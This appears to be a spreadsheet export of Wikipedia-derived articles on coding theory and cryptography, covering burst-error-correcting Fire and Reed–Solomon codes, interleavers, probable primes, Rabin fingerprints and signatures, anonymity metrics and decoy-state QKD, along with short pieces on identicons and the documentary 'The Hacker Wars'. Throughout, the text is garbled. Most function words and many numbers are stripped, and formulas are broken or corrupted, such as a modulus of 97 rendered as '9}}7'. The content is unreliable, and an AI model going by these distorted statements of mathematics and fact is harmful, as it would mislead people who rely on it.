a(x)+x^{b}b(x)=1+a_{1}x+a_{2}x^{2}+\ldots +x^{\ell _{1}-1}+x^{b}\left(1+b_{1}x+b_{2}x^{2}+\ldots +x^{\ell _{2}-1}\right).} term {\displaystyle x^{b}} appears, since {\displaystyle \delta &lt;b&lt;2\ell resulting expression {\displaystyle d(x)(x^{2\ell -1}+1)} contain {\displaystyle x^{b}} therefore {\displaystyle d(x)=0} subsequently {\displaystyle a(x)+x^{b}b(x)=0.} this requires {\displaystyle b=0} {\displaystyle a(x)=b(x)} revise division {\displaystyle j-i} {\displaystyle g(2\ell -1)} reflect {\displaystyle b=0,} {\displaystyle j-i=g(2\ell -1)} substituting back {\displaystyle v(x)} gives {\displaystyle v(x)=x^{i}b(x)\left(x^{j-1}+1\right).} since {\displaystyle \deg(b(x))=\ell _{2}-1&lt;\ell {\displaystyle \deg(b(x))&lt;\deg(p(x))=m} {\displaystyle p(x)} irreducible, therefore {\displaystyle b(x)} {\displaystyle p(x)} must relatively prime. since {\displaystyle v(x)} codeword, {\displaystyle x^{j-1}+1} must divisible {\displaystyle p(x)} cannot divisible {\displaystyle x^{2\ell -1}+1} therefore, {\displaystyle j-i} must multiple {\displaystyle must also multiple {\displaystyle 2\ell implies must multiple {\displaystyle n={\text{lcm}}(2\ell -1,p)} precisely block-length code. therefore, {\displaystyle j-i} cannot multiple {\displaystyle since less {\displaystyle thus, assumption {\displaystyle v(x)} codeword incorrect, therefore {\displaystyle x^{i}a(x)} {\displaystyle x^{j}b(x)} different cosets, unique syndromes, therefore correctable. example: 5-burst error correcting fire code with theory presented section, consider construction {\displaystyle -burst error correcting fire code. remember construct fire code, need irreducible polynomial {\displaystyle p(x)} integer {\displaystyle \ell representing burst error correction capability code, need satisfy property {\displaystyle 2\ell divisible period {\displaystyle p(x)} with requirements mind, consider irreducible polynomial {\displaystyle p(x)=1+x^{2}+x^{5}} {\displaystyle \ell since {\displaystyle p(x)} primitive polynomial, period {\displaystyle 2^{5}-1=31} confirm {\displaystyle 2\ell -1=9} divisible {\displaystyle thus, {\displaystyle g(x)=(x^{9}+1)\left(1+x^{2}+x^{5}\right)=1+x^{2}+x^{5}+x^{9}+x^{11}+x^{14}} fire code generator. calculate block-length code evaluating least common multiple {\displaystyle {\displaystyle 2\ell words, {\displaystyle n={\text{lcm}}(9,31)=279} thus, fire code cyclic code capable correcting burst length {\displaystyle less. binary reed–solomon codes certain families codes, reed–solomon, operate alphabet sizes larger binary. this property awards codes powerful burst error correction capabilities. consider code operating {\displaystyle \mathbb _{2^{m}}} each symbol alphabet represented {\displaystyle bits. {\displaystyle {\displaystyle (n,k)} reed–solomon code {\displaystyle \mathbb _{2^{m}}} think {\displaystyle {\displaystyle [mn,mk]_{2}} code {\displaystyle \mathbb _{2}} reason codes powerful burst error correction symbol represented {\displaystyle bits, general, irrelevant many {\displaystyle bits erroneous; whether single bit, {\displaystyle bits contain errors, decoding perspective still single symbol error. words, since burst errors tend occur clusters, strong possibility several binary errors contributing single symbol error. notice burst {\displaystyle (m+1)} errors affect {\displaystyle symbols, burst {\displaystyle 2m+1} affect {\displaystyle symbols. then, burst {\displaystyle tm+1} affect {\displaystyle t+1} symbols; implies {\displaystyle -symbols-error correcting code correct burst length {\displaystyle (t-1)m+1} general, {\displaystyle -error correcting reed–solomon code {\displaystyle \mathbb _{2^{m}}} correct combination {\displaystyle {\frac {t}{1+\lfloor (l+m-2)/m\rfloor fewer bursts length {\displaystyle able correct {\displaystyle -random worst case errors. example binary code {\displaystyle {\displaystyle [255,223,33]} code {\displaystyle \mathbb _{2^{8}}} this code employed nasa cassini-huygens spacecraft. capable correcting {\displaystyle \lfloor 33/2\rfloor =16} symbol errors. construct binary code {\displaystyle {\displaystyle each symbol written using {\displaystyle \lceil \log _{2}(255)\rceil bits. therefore, binary code 2040 1784 {\displaystyle [2040,1784,33]_{2}} parameters. capable correcting single burst length {\displaystyle l=121} interleaved codes interleaving used convert convolutional codes random error correctors burst error correctors. basic idea behind interleaved codes jumble symbols transmitter. this leads randomization bursts received errors closely located apply analysis random channel. thus, main function performed interleaver transmitter alter input symbol sequence. receiver, deinterleaver alter received sequence back original unaltered sequence transmitter. burst error correcting capacity interleaver theorem. burst error correcting ability code {\displaystyle \ell burst error correcting ability {\displaystyle \lambda -way interleave {\displaystyle \lambda \ell proof: suppose {\displaystyle (n,k)} code correct bursts length {\displaystyle \leqslant \ell interleaving provide {\displaystyle (\lambda n,\lambda code correct bursts length {\displaystyle \leqslant \lambda \ell given {\displaystyle \lambda want encode message arbitrary length using interleaving, first divide blocks length {\displaystyle \lambda write {\displaystyle \lambda entries block {\displaystyle \lambda \times matrix using row-major order. then, encode using {\displaystyle (n,k)} code. what {\displaystyle \lambda \times matrix. now, matrix read transmitted column-major order. trick occurs burst length {\displaystyle transmitted word, contain approximately {\displaystyle {\tfrac {h}{\lambda consecutive errors (more specifically, contain burst length least {\displaystyle \lfloor {\tfrac {h}{\lambda }}\rfloor {\displaystyle \lceil {\tfrac {h}{\lambda }}\rceil {\displaystyle h\leqslant \lambda \ell {\displaystyle {\tfrac {h}{\lambda }}\leqslant \ell {\displaystyle (n,k)} code correct row. therefore, interleaved {\displaystyle (\lambda n,\lambda code correct burst length {\displaystyle conversely, {\displaystyle h&gt;\lambda \ell least contain {\displaystyle {\tfrac {h}{\lambda consecutive errors, {\displaystyle (n,k)} code might fail correct them. therefore, error correcting ability interleaved {\displaystyle (\lambda n,\lambda code exactly {\displaystyle \lambda \ell efficiency interleaved code remains original {\displaystyle (n,k)} code. this true because: {\displaystyle {\frac {2\lambda \ell }{\lambda n-\lambda k}}={\frac {2\ell }{n-k}}} block interleaver figure shows interleaver. interleaver called block interleaver. here, input symbols written sequentially rows output symbols obtained reading columns sequentially. thus, form {\displaystyle m\times array. generally, {\displaystyle length codeword. capacity block interleaver: {\displaystyle m\times block interleaver burst length {\displaystyle \ell upper limit number errors {\displaystyle {\tfrac {\ell }{m}}.} this obvious fact reading output column wise number rows {\displaystyle theorem error correction capacity {\displaystyle maximum burst length allowed {\displaystyle mt.} burst length {\displaystyle mt+1} decoder fail. efficiency block interleaver {\displaystyle \gamma found taking ratio burst length decoder fail interleaver memory. thus, formulate {\displaystyle \gamma {\displaystyle \gamma ={\frac {mt+1}{mn}}\approx {\frac {t}{n}}.} drawbacks block interleaver clear figure, columns read sequentially, receiver interpret single receives complete message that. also, receiver requires considerable amount memory order store received symbols store complete message. thus, factors give rise drawbacks, latency storage (fairly large amount memory). these drawbacks avoided using convolutional interleaver described below. convolutional interleaver cross interleaver kind multiplexer-demultiplexer system. system, delay lines used progressively increase length. delay line basically electronic circuit used delay signal certain time duration. {\displaystyle number delay lines {\displaystyle number symbols introduced delay line. thus, separation consecutive inputs {\displaystyle symbols. length codeword {\displaystyle \leqslant thus, symbol input codeword distinct delay line. burst error length {\displaystyle \ell occur. since separation consecutive symbols {\displaystyle nd,} number errors deinterleaved output contain {\displaystyle {\tfrac {\ell }{nd+1}}.} theorem above, error correction capacity {\displaystyle maximum burst length allowed {\displaystyle (nd+1)(t-1).} burst length {\displaystyle (nd+1)(t-1)+1,} decoder fail. efficiency cross interleaver {\displaystyle \gamma found taking ratio burst length decoder fail interleaver memory. case, memory interleaver calculated {\displaystyle (0+1+2+3+\cdots +(n-1))d={\frac {n(n-1)}{2}}d.} thus, formulate {\displaystyle \gamma follows: {\displaystyle \gamma ={\frac {(nd+1)(t-1)+1}{{\frac {n(n-1)}{2}}d}}.} performance cross interleaver shown interleaver figure, output nothing diagonal symbols generated delay line. case, input multiplexer switch completes around half switching, read first receiver. thus, need store maximum around half message receiver order read first row. this drastically brings storage requirement half. since half message required read first row, latency also reduced half good improvement block interleaver. thus, total interleaver memory split transmitter receiver. applications compact disc without error correcting codes, digital audio would technically feasible. reed–solomon codes correct corrupted symbol single error easily correct symbol bits wrong. this makes codes particularly suitable correcting burst errors. far, common application codes compact discs. addition basic error correction provided codes, protection burst errors scratches disc provided cross interleaver.current compact disc digital audio system developed philips netherlands sony corporation japan (agreement signed 1979). compact disc comprises aluminized disc coated clear plastic coating, spiral track, approximately length, optically scanned laser wavelength ~0.8 constant speed ~1.25 m/s. achieving constant speed, rotation disc varied rev/s scanning inner portion track ~3.5 rev/s outer portion. pits lands depressions (0.12 deep) flat segments constituting binary data along track (0.6 width).the process abstracted sequence following sub-processes: channel encoding source signals mechanical sub-processes preparing master disc, producing user discs sensing signals embedded user discs playing channel decoding signals sensed user discs process subject burst errors random errors. burst errors include disc material (defects aluminum reflecting film, poor reflective index transparent disc material), disc production (faults disc forming disc cutting etc.), disc handling (scratches generally thin, radial orthogonal direction recording) variations play-back mechanism. random errors include jitter reconstructed signal wave interference signal. circ (cross-interleaved reed–solomon code) basis error detection correction process. corrects error bursts 3,500 bits sequence (2.4 length seen surface) compensates error bursts 12,000 bits (8.5 caused minor scratches. encoding: sound-waves sampled converted digital form converter. sound wave sampled amplitude 44.1 44,100 pairs, left right channels stereo sound). amplitude instance assigned binary string length thus, sample produces binary vectors {\displaystyle \mathbb _{2}^{16}} {\displaystyle \mathbb _{2}^{8}} bytes data. every second sound recorded results 44,100 1,411,200 bits (176,400 bytes) dat</t>
  </si>
  <si>
    <t>Differential equations of addition</t>
  </si>
  <si>
    <t>cryptography, differential equations addition (dea) basic equations related differential cryptanalysis additions different groups (e.g. addition modulo addition gf(2)) input output differences expressed xors. examples differential equations addition (dea) following form: {\displaystyle (x+y)\oplus ((x\oplus a)+(y\oplus b))=c} {\displaystyle {\displaystyle {\displaystyle -bit unknown variables {\displaystyle {\displaystyle {\displaystyle known variables. symbols {\displaystyle {\displaystyle \oplus denote addition modulo {\displaystyle 2^{n}} bitwise exclusive-or respectively. equation denoted {\displaystyle (a,b,c)} {\displaystyle s=\{(a_{i},b_{i},c_{i})|i&lt;k\}} integer {\displaystyle denote system {\displaystyle k(n)} {\displaystyle k(n)} polynomial {\displaystyle proved satisfiability arbitrary complexity class brute force search requires exponential time. 2013, properties special form reported chengqing al., {\displaystyle a=0} {\displaystyle assumed known. essentially, special represented {\displaystyle (x\dotplus \alpha )\oplus (x\dotplus \beta )=c} based found properties, algorithm deriving {\displaystyle proposed analyzed. applications solution arbitrary (either batch adaptive query model) souradyuti paul bart preneel. solution techniques used attack stream cipher helix. further reading souradyuti paul bart preneel, solving systems differential equations addition, acisp 2005. full version (pdf) souradyuti paul bart preneel, near optimal algorithms solving differential equations addition with batch queries, indocrypt 2005. full version (pdf) helger lipmaa, johan wallén, philippe dumas: additive differential probability exclusive-or. 2004: 317-331. references</t>
  </si>
  <si>
    <t>Probable prime</t>
  </si>
  <si>
    <t>number theory, probable prime (prp) integer satisfies specific condition satisfied prime numbers, satisfied composite numbers. different types probable primes different specific conditions. while probable primes composite (called pseudoprimes), condition generally chosen order make exceptions rare. fermat's test compositeness, based fermat's little theorem, works follows: given integer choose integer multiple (typically, choose range calculate modulo result composite. result likely prime; called probable prime base weak probable prime base integer probable prime base strong probable prime base (see below). fixed base unusual composite number probable prime (that pseudoprime) base. example, 109, 11,408,012,595 composite numbers, 21,853 pseudoprimes base 1005 number primes interval 1,091,987,404. properties probable primality basis efficient primality testing algorithms, find application cryptography. these algorithms usually probabilistic nature. idea composite probable primes base fixed hope exists fixed given composite choose random, probability pseudoprime base repeat test times, choosing time, probability pseudoprime tested hence decreases exponentially, moderate required make probability negligibly small (compared example, probability computer hardware error). this unfortunately false weak probable primes, exist carmichael numbers; true refined notions probable primality, strong probable primes 1/4, miller–rabin algorithm), euler probable primes 1/2, solovay–strassen algorithm). even deterministic primality proof required, useful first step test probable primality. this quickly eliminate (with certainty) composites. test sometimes combined table small pseudoprimes quickly establish primality given number smaller threshold. variations euler probable prime base integer indicated prime somewhat stronger theorem prime a(p−1)/2 equals {\displaystyle ({\tfrac {a}{p}})} modulo {\displaystyle ({\tfrac {a}{p}})} jacobi symbol. euler probable prime composite called euler–jacobi pseudoprime base smallest euler-jacobi pseudoprime base 561.: 1004 there 11347 euler-jacobi pseudoprimes base less 25·109.: 1005 this test improved using fact square roots modulo prime write odd. number strong probable prime (sprp) base {\displaystyle a^{d}\equiv 1{\pmod {n}},\;} {\displaystyle a^{d\cdot 2^{r}}\equiv -1{\pmod {n}}{\text{ }}0\leq r\leq s-1.\,} composite strong probable prime base called strong pseudoprime base every strong probable prime base also euler probable prime base, vice versa. smallest strong pseudoprime base 2047.: 1004 there 4842 strong pseudoprimes base less 25·109.: 1005 there also lucas probable primes, based lucas sequences. lucas probable prime test used alone. baillie–psw primality test combines lucas test strong probable prime test. example sprp test whether strong probable prime base step find {\displaystyle {\displaystyle {\displaystyle 96=d\cdot 2^{s}} {\displaystyle beginning {\displaystyle s=0} {\displaystyle would {\displaystyle increasing {\displaystyle {\displaystyle d=3} {\displaystyle s=5} since {\displaystyle 96=3\cdot 2^{5}} step choose {\displaystyle {\displaystyle 1&lt;a&lt;97-1} choose {\displaystyle a=2} step calculate {\displaystyle a^{d}{\bmod {n}}} i.e. {\displaystyle 2^{3}{\bmod {9}}7} since congruent {\displaystyle continue test next condition step calculate {\displaystyle 2^{3\cdot 2^{r}}{\bmod {9}}7} {\displaystyle 0\leq r&lt;s} congruent {\displaystyle {\displaystyle probably prime. otherwise, {\displaystyle definitely composite {\displaystyle r=0:2^{3}\equiv 8{\pmod {97}}} {\displaystyle r=1:2^{6}\equiv 64{\pmod {97}}} {\displaystyle r=2:2^{12}\equiv 22{\pmod {97}}} {\displaystyle r=3:2^{24}\equiv 96{\pmod {97}}} therefore, {\displaystyle strong probable prime base (and therefore probable prime base also baillie–psw primality test euler–jacobi pseudoprime carmichael number lucas pseudoprime miller–rabin primality test provable prime external links prime glossary probable prime 10000 (the largest known probable primes) references</t>
  </si>
  <si>
    <t>Polynomial-time counting reduction</t>
  </si>
  <si>
    <t>computational complexity theory counting problems, polynomial-time counting reduction type reduction transformation problem another) used define notion completeness complexity class these reductions also called polynomial many-one counting reductions weakly parsimonious reductions; analogous many-one reductions decision problems generalize parsimonious reductions. definition polynomial-time counting reduction usually used transform instances known-hard problem {\displaystyle instances another problem {\displaystyle proven hard. consists functions {\displaystyle {\displaystyle must computable polynomial time. function {\displaystyle transforms inputs {\displaystyle inputs {\displaystyle function {\displaystyle transforms outputs {\displaystyle outputs {\displaystyle .these functions must preserve correctness output. that suppose transforms input {\displaystyle problem {\displaystyle input {\displaystyle y=f(x)} problem {\displaystyle solves {\displaystyle produce output {\displaystyle must case transformed output {\displaystyle g(z)} correct output original input {\displaystyle that input-output relations {\displaystyle {\displaystyle expressed functions, function composition must obey identity {\displaystyle x=g\circ y\circ alternatively, expressed terms algorithms, possible algorithm solving {\displaystyle would apply {\displaystyle transform problem instance {\displaystyle solve instance, apply {\displaystyle transform output {\displaystyle correct answer {\displaystyle relation kinds reduction special case, parsimonious reduction polynomial-time transformation {\displaystyle inputs problems preserves exact values outputs. such reduction viewed polynomial-time counting reduction, using identity function function {\displaystyle applications complexity theory functional problem (specified inputs desired outputs) belongs complexity class exists non-deterministic turing machine runs polynomial time, output problem number accepting paths turing machine. intuitively, problems count number solutions problems complexity class functional problem {\displaystyle said ♯p-hard exists polynomial-time counting reduction every problem {\displaystyle {\displaystyle addition, {\displaystyle belongs {\displaystyle said ♯p-complete. (sometimes, valiant's original paper proving completeness permanent matrices, weaker notion reduction, turing reduction, instead used defining ♯p-completeness.) usual method proving problem {\displaystyle ♯p-complete start single known ♯p-complete problem {\displaystyle find polynomial-time counting reduction {\displaystyle {\displaystyle reduction exists, exists reduction problem {\displaystyle obtained composing reduction problem {\displaystyle reduction {\displaystyle {\displaystyle references</t>
  </si>
  <si>
    <t>Rabin fingerprint</t>
  </si>
  <si>
    <t>rabin fingerprinting scheme method implementing fingerprints using polynomials finite field. proposed michael rabin. scheme given n-bit message m0,...,mn-1, view polynomial degree finite field gf(2). {\displaystyle f(x)=m_{0}+m_{1}x+\ldots +m_{n-1}x^{n-1}} pick random irreducible polynomial {\displaystyle p(x)} degree gf(2), define fingerprint message remainder {\displaystyle r(x)} division {\displaystyle f(x)} {\displaystyle p(x)} gf(2) viewed polynomial degree k-bit number. applications many implementations rabin–karp algorithm internally rabin fingerprints. bandwidth network filesystem (lbfs) uses rabin fingerprints implement variable size shift-resistant blocks. basic idea filesystem computes cryptographic hash block file. save transfers client server, compare checksums transfer blocks whose checksums differ. problem scheme single insertion beginning file cause every checksum change fixed-sized (e.g. blocks used. idea select blocks based specific offset rather property block contents. lbfs sliding byte window file computing rabin fingerprint window. when bits fingerprint zero lbfs calls bytes breakpoint ends current block begins one. since output rabin fingerprints pseudo-random probability given bytes breakpoint {\displaystyle 2^{-13}} 8192). this effect shift-resistant variable size blocks. hash function could used divide long file blocks long cryptographic hash function used find checksum block): rabin fingerprint efficient rolling hash, since computation rabin fingerprint region reuse computation rabin fingerprint region regions overlap. note problem similar faced rsync. also w-shingling rolling hash references external links andrei broder (1993). "some applications rabin's fingerprinting method": 143–152. retrieved 2011-09-12. {{cite journal}}: cite journal requires |journal= (help) david andersen (2007). "exploiting similarity multi-source downloads using file handprints". retrieved 2007-04-12. {{cite journal}}: cite journal requires |journal= (help) ross williams (1993). painless guide error detection algorithms".</t>
  </si>
  <si>
    <t>Degree of anonymity</t>
  </si>
  <si>
    <t>anonymity networks (e.g., tor, crowds, mixmaster, i2p, etc.), important able measure quantitatively guarantee given system. degree anonymity {\displaystyle device proposed 2002 privacy enhancing technology (pet) conference. there papers forth idea using entropy basis formally measuring anonymity: "towards information theoretic metric anonymity", "towards measuring anonymity". ideas presented similar minor differences final definition {\displaystyle background anonymity networks developed many introduced methods proving anonymity guarantees possible, originally simple chaum mixes pool mixes size users seen security system could provide user. this number problems; intuitively network international unlikely message contains urdu came united states, vice versa. information like methods like predecessor attack intersection attack helps attacker increase probability user sent message. example with pool mixes example consider network shown above, {\displaystyle a,b,c} {\displaystyle users (senders), {\displaystyle q,r,s} {\displaystyle servers (receivers), boxes mixes, {\displaystyle \{a,b\}\in {\displaystyle \{a,b,c\}\in {\displaystyle \{a,b,c,d\}\in q,r} {\displaystyle denotes anonymity set. pool mixes number incoming messages wait sending {\displaystyle {\displaystyle a,b} {\displaystyle communicating {\displaystyle {\displaystyle receives message {\displaystyle knows must come {\displaystyle links mixes {\displaystyle message time). this reflected {\displaystyle anonymity set, taken account analysis network. degree anonymity degree anonymity takes account probability associated user, begins defining entropy system (here papers differ slightly notation, notation [1].): {\displaystyle h(x):=\sum _{i=1}^{n}\left[p_{i}\cdot \left({\frac {1}{p_{i}}}\right)\right]} {\displaystyle h(x)} entropy network, {\displaystyle number nodes network, {\displaystyle p_{i}} probability associated node {\displaystyle maximal entropy network occurs uniform probability associated node {\displaystyle \left({\frac {1}{n}}\right)} yields {\displaystyle h_{m}:=h(x)\gets \lg(n)} degree anonymity (now papers differ slightly definition here, defines bounded degree compared {\displaystyle h_{m}} gives unbounded definition—using entropy directly, consider bounded case here) defined {\displaystyle d:=1-{\frac {h_{m}-h(x)}{h_{m}}}={\frac {h(x)}{h_{m}}}} using anonymity systems compared evaluated using quantitatively analysis. definition attacker these papers also served give concise definitions attacker: internal/external internal attacker controls nodes network, whereas external compromise communication channels nodes. passive/active active attacker add, remove, modify messages, whereas passive attacker listen messages. local/global local attacker access part network, whereas global access entire network. example {\displaystyle papers number example calculations {\displaystyle walk here. crowds crowds global probability forwarding {\displaystyle p_{f}} probability node forward message internally instead routing final destination. {\displaystyle corrupt nodes {\displaystyle total nodes. crowds attacker internal, passive, local. trivially {\displaystyle h_{m}\gets \lg(n-c)} overall entropy {\displaystyle h(x)\gets {\frac {n-p_{f}\cdot (n-c-1)}{n}}\cdot \left[{\frac {n}{n-p_{f}\cdot (n-c-1)}}\right]+p_{f}\cdot {\frac {n-c-1}{n}}\cdot \left[n/p_{f}\right]} {\displaystyle value divided {\displaystyle h_{m}} [4]. onion routing onion routing let's assume attacker exclude subset nodes network, entropy would easily {\displaystyle h(x)\gets \lg(s)} {\displaystyle size subset non-excluded nodes. under attack model node globally listen message passing node path decreases {\displaystyle h(x)\gets \lg(l)} {\displaystyle length onion route (this could larger smaller {\displaystyle attempt onion routing remove correlation incoming outgoing messages. applications metric 2004, diaz, sassaman, dewitte presented analysis[5] anonymous remailers using serjantov danezis metric, showing provide zero anonymity certain realistic conditions. also onion routing (anonymity network) entropy crowds references towards measuring anonymity claudia diaz stefaan seys joris claessens bart preneel (april 2002). roger dingledine paul syverson (ed.). "towards measuring anonymity". proceedings privacy enhancing technologies workshop (pet 2002). springer-verlag, lncs 2482. archived original july 2006. retrieved 2005-11-10. towards information theoretic metric anonymityandrei serjantov george danezis (april 2002). roger dingledine paul syverson (ed.). "towards information theoretic metric anonymity". proceedings privacy enhancing technologies workshop (pet 2002). springer-verlag, lncs 2482. archived original july 2004. retrieved 2005-11-10. comparison between practical designs claudia diaz sassaman evelyn dewitte (september 2004). dieter gollmann (ed.). "comparison between practical designs" (pdf). proceedings european symposium research computer security (esorics 2004). springer-verlag, lncs 3193. retrieved 2008-06-06.</t>
  </si>
  <si>
    <t>Decoy state</t>
  </si>
  <si>
    <t>within quantum cryptography, decoy state quantum distribution (qkd) protocol widely implemented scheme. practical systems multi-photon sources, contrast standard bb84 protocol, making susceptible photon number splitting (pns) attacks. this would significantly limit secure transmission rate maximum channel length practical systems. decoy state technique, fundamental weakness practical systems addressed using multiple intensity levels transmitter's source, i.e. qubits transmitted alice using randomly chosen intensity levels (one signal state several decoy states), resulting varying photon number statistics throughout channel. transmission alice announces publicly intensity level used transmission qubit. successful attack requires maintaining error rate (ber) receiver's end, accomplished multiple photon number statistics. monitoring bers associated intensity level, legitimate parties able detect attack, highly increased secure transmission rates maximum channel lengths, making systems suitable practical applications. motivation security proofs protocols, bb84, single photon source assumed used sender, alice. reality, perfect single photon source exist. instead, practical sources, weak coherent state laser source, widely used qkd. problem practical sources lies multi-photon components. serious security loophole exists alice uses multi-photon states quantum information carriers. with multi-photon components, eavesdropper, eve, could principle split photons, keep photon, send rest bob. after alice announce basis information, measure intercepted photon information. when channel lossy, launch sophisticated attacks, photon number splitting attack. order minimize effects multi-photon states, alice extremely weak laser source, results relatively speed qkd. decoy-state method proposed solve multi-photon issue using different photon intensities instead one. with decoy states, practical sources, coherent-state source heralded parametric down-conversion (pdc) source, perform almost well single photon source. development decoy-state scheme proposed won-young hwang northwestern university. later, security proven developing photon number channel model assuming usage infinite number decoy states. common practical decoy-state method needs decoy states, vacuum decoy weak decoy. this vacuum+weak decoy state method first proposed hoi-kwong university toronto, analyzed others. shown vacuum weak decoy states, achieved rate close infinite decoy state case. experimental demonstrations first decoy state method experiment performed hoi-kwong lo's group collaborator qian, one-decoy state method employed. transmission distance generation speed bit/s. then, longer distance demonstrated vacuum+weak decoy state method fiber. later, three experimental groups demonstrate decoy-state method distances. there many demonstrations afterwards. decoy-state using non-coherent-state sources decoy state protocols non-coherent-state sources also analyzed. passive decoy state protocol, decoy states prepared passively, proposed parametric down-conversion source. also quantum cryptography quantum distribution list quantum distribution protocols quantum network references external links world scientific</t>
  </si>
  <si>
    <t>Rabin signature algorithm</t>
  </si>
  <si>
    <t>cryptography, rabin signature algorithm method digital signature originally proposed michael rabin 1978.the rabin signature algorithm first digital signature schemes proposed. introducing hashing essential step signing, first design meet modern standard security forgery, existential unforgeability chosen-message attack, assuming suitably scaled parameters. rabin signatures resemble signatures 'exponent {\displaystyle e=2} leads qualitative differences enable efficient implementation security guarantee relative difficulty integer factorization, proven rsa. however, rabin signatures seen relatively little standardization outside ieee p1363 comparison signature schemes rsassa-pkcs1-v1_5 rsassa-pss. definition rabin signature scheme parametrized randomized hash function {\displaystyle h(m,u)} message {\displaystyle {\displaystyle -bit randomization string {\displaystyle public public pair integers {\displaystyle (n,b)} {\displaystyle 0\leq b&lt;n} {\displaystyle odd. signature signature message {\displaystyle pair {\displaystyle (u,x)} {\displaystyle -bit string {\displaystyle integer {\displaystyle private private public {\displaystyle (n,b)} secret prime factorization {\displaystyle p\cdot {\displaystyle chosen uniformly random space large primes. {\displaystyle d=(b/2){\bmod {n}}} {\displaystyle d_{p}=(b/2){\bmod {p}}} {\displaystyle d_{q}=(b/2){\bmod {q}}} make signature message {\displaystyle signer picks {\displaystyle -bit string {\displaystyle uniformly random, computes {\displaystyle c:=h(m,u)} {\displaystyle c+d^{2}} quadratic nonresidue modulo {\displaystyle signer throws away {\displaystyle tries again. otherwise, signer computes using standard algorithm computing square roots modulo prime—picking {\displaystyle p\equiv q\equiv 3{\pmod {4}}} makes easiest. square roots unique, different variants signature scheme make different choices square root; case, signer must ensure reveal different roots hash {\displaystyle signer uses chinese remainder theorem solve system {\displaystyle signer finally reveals {\displaystyle (u,x)} .correctness signing procedure follows evaluating {\displaystyle x(x+b)-h(m,u)} modulo {\displaystyle {\displaystyle {\displaystyle constructed. example, simple case {\displaystyle b=0} {\displaystyle simply square root {\displaystyle h(m,u)} modulo {\displaystyle number trials {\displaystyle geometrically distributed expectation around integers quadratic residues modulo {\displaystyle security security adversary defined generically terms hash function {\displaystyle (i.e., security random oracle model) follows difficulty factoring {\displaystyle adversary high probability success forgery can, nearly high probability, find distinct square roots {\displaystyle x_{1}} {\displaystyle x_{2}} random integer {\displaystyle modulo {\displaystyle {\displaystyle x_{1}\pm x_{2}\not \equiv 0{\pmod {n}}} {\displaystyle \gcd(x_{1}\pm x_{2},n)} nontrivial factor {\displaystyle since {\displaystyle {x_{1}}^{2}\equiv {x_{2}}^{2}\equiv c{\pmod {n}}} {\displaystyle n\mid {x_{1}}^{2}-{x_{2}}^{2}=(x_{1}+x_{2})(x_{1}-x_{2})} {\displaystyle n\nmid x_{1}\pm x_{2}} formalizing security modern terms requires filling additional details, codomain {\displaystyle standard size {\displaystyle prime factors, {\displaystyle 2^{k-1}&lt;p&lt;q&lt;2^{k}} might specify {\displaystyle h\colon \{0,1\}^{*}\times \{0,1\}^{k}\to \{0,1\}^{k}} .randomization hash function introduced allow signer find quadratic residue, randomized hashing signatures later became relevant right tighter security theorems resilience collision attacks fixed hash functions. variants quantity {\displaystyle public adds security, since algorithm solve congruences {\displaystyle x(x+b)\equiv c{\pmod {n}}} {\displaystyle given {\displaystyle {\displaystyle trivially used subroutine algorithm compute square roots modulo {\displaystyle vice versa, implementations safely {\displaystyle b=0} simplicity; {\displaystyle discarded altogether treatments initial proposal.the rabin signature scheme later tweaked williams 1980 choose {\displaystyle p\equiv 3{\pmod {8}}} {\displaystyle q\equiv 7{\pmod {8}}} replace square root {\displaystyle tweaked square root {\displaystyle (e,f,x)} {\displaystyle e=\pm {\displaystyle f\in \{1,2\}} signature instead satisfies allows signer create signature single trial without sacrificing security. this variant known rabin–williams. further variants allow tradeoffs signature size verification speed, partial message recovery, signature compression, public compression.variants without hash function published textbooks, crediting rabin exponent hash function. these variants trivially broken—for example, signature {\displaystyle x=2} forged anyone valid signature message {\displaystyle m=4} signature verification equation {\displaystyle x^{2}\equiv m{\pmod {n}}} instead {\displaystyle x^{2}\equiv h(m,u){\pmod {n}}} original paper, hash function {\displaystyle h(m,u)} written notation {\displaystyle c(mu)} compression, using juxtaposition denote concatenation {\displaystyle {\displaystyle strings: convention, wishing sign given message, {\displaystyle [the signer] {\displaystyle adds suffix word {\displaystyle agreed upon length {\displaystyle choice {\displaystyle randomized time message signed. signer compresses {\displaystyle m_{1}=mu} hashing function word {\displaystyle c(m_{1})=c} binary number {\displaystyle c\leq this notation confusion among authors later ignored {\displaystyle part misunderstood {\displaystyle mean multiplication, giving misapprehension trivially broken signature scheme. references external links rabin–williams signatures cr.yp.to</t>
  </si>
  <si>
    <t>Identicon</t>
  </si>
  <si>
    <t>identicon visual representation hash value, usually address, serves identify user computer system form avatar protecting user's privacy. original identicon 9-block graphic, representation extended graphic forms third parties. invention park came identicon idea january 2007. words: originally came idea used easy means visually distinguishing multiple units information, anything reduced bits. it's also people, places, things. imho, much read textual numeric information easy distinguish glance jumbled together. think adding visual identifiers make user experience much enjoyable. similar method previously described adrian perrig dawn song 1999 publication hash visualization, already seen wide random keys. applications github uses identicons visually differentiate users avatar. wikis blogs generate identicons visually identify authors based addresses. this provides protection impersonation without requiring authentication. third-party software available generate identicons purposes identifying ebay sellers. original identicon idea expanded include couple new, simple effective, anti-phishing protection schemes. requires client-side support; park interested talking browser vendors regarding incorporation. calls expansion "gemini." there add-on firefox called identfavicon quantum that, websites without favicons, replaces identicons based address website. anonymous email forwarding service idbloc uses identicons help quickly distinguish different email addresses visually references external links park's original source code github mavenized project based park's original source code github identicons visual fingerprints phil haack php-identicons identicon coldfusion implementation identicons sigil nidenticon .net implementation identicons identicons used wild idbloc</t>
  </si>
  <si>
    <t>The Hacker Wars</t>
  </si>
  <si>
    <t>hacker wars 2014 documentary film hacktivism united states, directed vivien lesnik weisman. released october 2014 us.barrett brown, appeared documentary, examined spokesperson anonymous, label disputes.the hacker wars tells story three young information activists, hacktivists, battles government. these hacktivists either terrorists freedom fighters depending one's perspective control information. “weev,” infamous hacker troll; barrett brown, journalist propagandist hacktivist collective, anonymous; jeremy hammond, anarchaos, arrest number fbi's cyber-criminal list. fourth character sabu, hacker turned informant fbi's cyber unit months responsible arrests. shadowy protagonist high-stakes game espionage betrayal internet. film barrett brown, american journalist, facing years prison publicizing information revealed jeremy hammond's epic hacks. hammond begun 10-year prison term. andrew aurenheimer, known hacker handle “weev” embarrasses large corporations. sentenced months hacking at&amp;t, conviction overturned. vows continue landed prison first place. film structured like nashville meth. viewer shuttled story lines lightning speed mirroring disjointed lives protagonists life internet. glenn greenwald (snowden leaks), pulitzer prize-winning journalist; thomas drake, former senior executive nsa; “the original edward snowden”; others explain anti-heroes exposing security surveillance state hacking supported rather jailed. they merely unveiling 